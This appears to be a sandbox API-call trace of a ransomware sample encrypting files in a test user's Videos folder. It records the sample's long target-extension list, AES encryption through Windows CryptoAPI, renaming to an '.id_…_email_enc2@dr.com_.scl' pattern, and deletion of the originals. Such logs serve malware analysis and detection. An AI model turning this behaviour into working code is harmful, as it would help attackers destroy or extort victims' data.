	[0202.160] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0202.160] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0202.160] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0202.182] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x1333, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x189930*=0x1333, lpOverlapped=0x0) returned 1
	[0202.185] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.185] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcae68) returned 1
	[0202.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.187] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0202.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.187] CryptHashData (hHash=0xfb9670, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0202.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.188] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9670, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb95f0) returned 1
	[0202.188] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.188] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x1333, dwBufLen=0x1333 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x1340) returned 1
	[0202.191] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.191] RtlMoveMemory (in: Destination=0xfe11a0, Source=0xfde188, Length=0x1333 | out: Destination=0xfe11a0) 
	[0202.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.191] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe11a0*, pdwDataLen=0x1894dc*=0x1333, dwBufLen=0x1340 | out: pbData=0xfe11a0*, pdwDataLen=0x1894dc*=0x1340) returned 1
	[0202.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.192] CryptDestroyKey (hKey=0xfb95f0) returned 1
	[0202.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.192] CryptDestroyHash (hHash=0xfb9670) returned 1
	[0202.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.192] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0202.192] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.192] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0202.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.193] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0202.194] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 127
	[0202.194] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
	[0202.195] WriteFile (in: hFile=0x32c, lpBuffer=0xfe11a0*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesWritten=0x189938*=0x1340, lpOverlapped=0x0) returned 1
	[0202.198] CloseHandle (hObject=0x32c) returned 1
	[0202.198] CloseHandle (hObject=0x390) returned 1
	[0202.198] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4")) returned 1
	[0202.201] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\b5 8le_nsymjbdwicv.mp4")) returned 0
	[0202.202] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42af0ca0, ftCreationTime.dwHighDateTime=0x1d974f8, ftLastAccessTime.dwLowDateTime=0xc758a210, ftLastAccessTime.dwHighDateTime=0x1d97631, ftLastWriteTime.dwLowDateTime=0xc758a210, ftLastWriteTime.dwHighDateTime=0x1d97631, nFileSizeHigh=0x0, nFileSizeLow=0x7027, dwReserved0=0x0, dwReserved1=0x0, cFileName="fjpB77QH_86Nw7S-hY.swf", cAlternateFileName="FJPB77~1.SWF")) returned 1
	[0202.202] lstrcmpW (lpString1="fjpB77QH_86Nw7S-hY.swf", lpString2="..") returned 1
	[0202.202] lstrcmpW (lpString1="fjpB77QH_86Nw7S-hY.swf", lpString2=".") returned 1
	[0202.202] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\"
	[0202.202] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\", lpString2="fjpB77QH_86Nw7S-hY.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\fjpB77QH_86Nw7S-hY.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\fjpB77QH_86Nw7S-hY.swf"
	[0202.202] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\fjpB77QH_86Nw7S-hY.swf") returned 85
	[0202.202] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0202.203] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\fjpB77QH_86Nw7S-hY.swf", cchLength=0x55 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf") returned 0x55
	[0202.203] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.203] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0202.203] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf"
	[0202.203] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf") returned 85
	[0202.203] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.203] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.204] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0202.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.204] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0202.204] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0202.206] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0202.206] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0202.207] ReadFile (in: hFile=0x390, lpBuffer=0xfe11a0, nNumberOfBytesToRead=0x7027, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesRead=0x189930*=0x7027, lpOverlapped=0x0) returned 1
	[0202.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.210] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcac48) returned 1
	[0202.212] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.212] CryptCreateHash (in: hProv=0xfcac48, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0202.212] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.213] CryptHashData (hHash=0xfb91b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0202.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.213] CryptDeriveKey (in: hProv=0xfcac48, Algid=0x6610, hBaseData=0xfb91b0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb8ff0) returned 1
	[0202.213] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.213] CryptEncrypt (in: hKey=0xfb8ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x7027, dwBufLen=0x7027 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x7030) returned 1
	[0202.214] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.214] RtlMoveMemory (in: Destination=0xfe81d0, Source=0xfe11a0, Length=0x7027 | out: Destination=0xfe81d0) 
	[0202.214] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.214] CryptEncrypt (in: hKey=0xfb8ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe81d0*, pdwDataLen=0x1894dc*=0x7027, dwBufLen=0x7030 | out: pbData=0xfe81d0*, pdwDataLen=0x1894dc*=0x7030) returned 1
	[0202.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.217] CryptDestroyKey (hKey=0xfb8ff0) returned 1
	[0202.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.217] CryptDestroyHash (hHash=0xfb91b0) returned 1
	[0202.217] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.217] CryptReleaseContext (hProv=0xfcac48, dwFlags=0x0) returned 1
	[0202.217] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.218] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0202.218] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0202.218] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0202.219] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 127
	[0202.219] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
	[0202.220] WriteFile (in: hFile=0x32c, lpBuffer=0xfe81d0*, nNumberOfBytesToWrite=0x7030, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfe81d0*, lpNumberOfBytesWritten=0x189938*=0x7030, lpOverlapped=0x0) returned 1
	[0202.224] CloseHandle (hObject=0x32c) returned 1
	[0202.225] CloseHandle (hObject=0x390) returned 1
	[0202.225] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf")) returned 1
	[0202.231] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\fjpb77qh_86nw7s-hy.swf")) returned 0
	[0202.231] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32f53870, ftCreationTime.dwHighDateTime=0x1d971d3, ftLastAccessTime.dwLowDateTime=0xcc5b810, ftLastAccessTime.dwHighDateTime=0x1d9752e, ftLastWriteTime.dwLowDateTime=0xcc5b810, ftLastWriteTime.dwHighDateTime=0x1d9752e, nFileSizeHigh=0x0, nFileSizeLow=0x11c0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LjfQsSpZ60HKke5.mp4", cAlternateFileName="LJFQSS~1.MP4")) returned 1
	[0202.231] lstrcmpW (lpString1="LjfQsSpZ60HKke5.mp4", lpString2="..") returned 1
	[0202.231] lstrcmpW (lpString1="LjfQsSpZ60HKke5.mp4", lpString2=".") returned 1
	[0202.232] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\"
	[0202.232] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\", lpString2="LjfQsSpZ60HKke5.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\LjfQsSpZ60HKke5.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\LjfQsSpZ60HKke5.mp4"
	[0202.232] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\LjfQsSpZ60HKke5.mp4") returned 82
	[0202.232] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0202.232] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\pz4QOFg\\V0OT\\LjfQsSpZ60HKke5.mp4", cchLength=0x52 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4") returned 0x52
	[0202.232] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.232] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4", lpSrch="help_decrypt_your_files") returned 0x0
	[0202.232] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4"
	[0202.233] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\pz4qofg\\v0ot\\ljfqsspz60hkke5.mp4") returned 82
	[0202.233] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0202.233] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0202.233] StrStrW (lpFirst=".mp4", lpSrch=".") returned=".mp4"
